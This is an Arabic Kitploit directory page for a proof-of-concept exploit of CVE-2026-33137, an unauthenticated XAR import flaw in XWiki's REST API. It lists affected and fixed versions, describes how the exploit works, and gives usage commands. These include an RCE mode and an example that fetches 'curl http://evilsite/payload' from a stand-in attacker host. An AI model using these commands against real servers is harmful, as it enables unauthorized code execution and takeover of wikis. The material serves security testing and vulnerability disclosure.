Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-33137 — XWiki Platform - CVE-2026-33137 PoC - Unauthenticated XAR Import via REST /wikis/{wikiName} | Kitploit
أدوات/GitHubGitHub/portbuster1337/cve-2026-33137
Payload GenerationVulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingLearning & EducationRed Teaming
GitHubportbuster1337/cve-2026-33137

CVE-2026-33137

XWiki Platform - CVE-2026-33137 PoC - Unauthenticated XAR Import via REST /wikis/{wikiName}

عرض المستودع
منذ 2 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-33137

منصة XWiki - استيراد XAR غير مصادق عليه عبر REST /wikis/{wikiName}

الوصف

تنفّذ نقطة نهاية REST API الخاصة بـ POST /wikis/{wikiName} في منصة XWiki استيراد XAR (أرشيف XWiki) دون إجراء أي فحوصات مصادقة أو تفويض. يمكن لمهاجم غير مصادق عليه إنشاء أو تحديث مستندات عشوائية في الويكي المستهدف عن طريق إرسال ملف XAR مُعدّ بعناية.

  • CVE: CVE-2026-33137
  • CWE: CWE-862 - تفويض مفقود
  • CVSS 4.0: 9.3 (حرج) - AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N
  • تاريخ النشر: 2026-05-20

الإصدارات المتأثرة

الحالةالإصدارات
متأثر> 15.10.16, > 16.4.6, > 16.10.2
مُصلَّح16.10.17, 17.4.9, 17.10.3, 18.0.1, 18.1.0-rc-1

التأثير

يمكن لمهاجم غير مصادق عليه:

  • إنشاء صفحات الويكي عشوائيًا بمحتوى عشوائي
  • استبدال صفحات الويكي الموجودة
  • تحقيق RCE (تنفيذ تعليمات برمجية عن بُعد) محتمل عن طريق إنشاء صفحات تحتوي على سكربتات Velocity/Groovy خبيثة (إذا كان تشغيل السكربتات مفعّلاً)

التفاصيل

تقبل نقطة نهاية REST POST /xwiki/rest/wikis/{wikiName} ملف XAR في نص الطلب وتستورده مباشرةً إلى الويكي دون التحقق مما إذا كان مقدّم الطلب يمتلك صلاحيات ADMIN. يضيف الإصلاح (commit 4b7b95b) فحص تفويض باستخدام ContextualAuthorizationManager.checkAccess(Right.ADMIN, ...).

استخدام الـ PoC

root@kitploit:~
# Install requirements
pip install requests

# Basic usage
python poc.py -t http://target:8080

# Specify wiki, space, and page names
python poc.py -t http://target:8080 -w xwiki -s MySpace -p MyPage

# Probe the target first
python poc.py -t http://target:8080 --probe

# Use a proxy (e.g., Burp Suite)
python poc.py -t http://target:8080 --proxy http://127.0.0.1:8080

# Custom content
python poc.py -t http://target:8080 -c "Proof of Concept"

# RCE mode: execute a command on the target server
python poc.py -t http://target:8080 --rce "id"

# RCE with authenticated triggering (if credentials are available)
python poc.py -t http://target:8080 --rce "curl http://evilsite/payload" -u admin --password pass

وضع RCE (--rce)

يستورد الخيار --rce صفحات تحتوي على حمولات Groovy وVelocity تنفّذ نص الأمر المحدد. ويقوم تلقائيًا بما يلي:

  1. إجراء فحص مسبق (كشف الإصدار، حالة الثغرة، اختبار نقطة نهاية XAR، إمكانية الوصول إلى مسارات التشغيل)
  2. استيراد صفحات تحتوي على الأمر المحدد من قبل المستخدم مضمّنًا في ماكرو {{groovy}} و{{velocity}}
  3. محاولة العرض عبر REST API وواجهة الويب والحقن بنمط SSTI
  4. الإبلاغ عن مسارات التشغيل المتاحة مقابل المحظورة

متطلبات نجاح RCE:

  • يجب أن يسمح الهدف بعرض الصفحات كضيف (أو تقديم بيانات اعتماد عبر -u / --password)
  • يجب تفعيل صلاحيات السكربت أو البرمجة للمستخدم الذي يعرض الصفحات
  • يجب ألا تكون مسارات التشغيل محظورة بعمليات إعادة توجيه المصادقة

كيف تعمل أداة الاستغلال

  1. يتم إنشاء ملف XAR (ZIP) مصغّر يحتوي على:
    • package.xml - واصف الحزمة
    • {Space}/{Page}.xml - مستند XML مع المحتوى
  2. يتم إرسال بايتات ملف XAR عبر POST إلى نقطة النهاية القابلة للاستغلال
  3. إذا كان الهدف قابلاً للاستغلال، يتم إنشاء المستند دون مصادقة
  4. تحقق اختياري عن طريق قراءة البيانات الوصفية للمستند

إخلاء المسؤولية

تم توفير هذا الـ PoC لأغراض تعليمية واختبار أمني مصرّح به فقط. الاستخدام غير المصرح به لأداة الاستغلال هذه ضد أنظمة لا تملكها أو ليس لديك إذن صريح لاختبارها يعد أمرًا غير قانوني. المؤلف غير مسؤول عن أي إساءة استخدام أو ضرر ناتج عن هذا البرنامج.

المراجع

  • التنبيه الأمني على GitHub GHSA-qrvh-r3f2-9h4r
  • Commit 4b7b95b (الإصلاح)
  • JIRA XWIKI-23953
  • إدخال NVD
تنزيل الأداة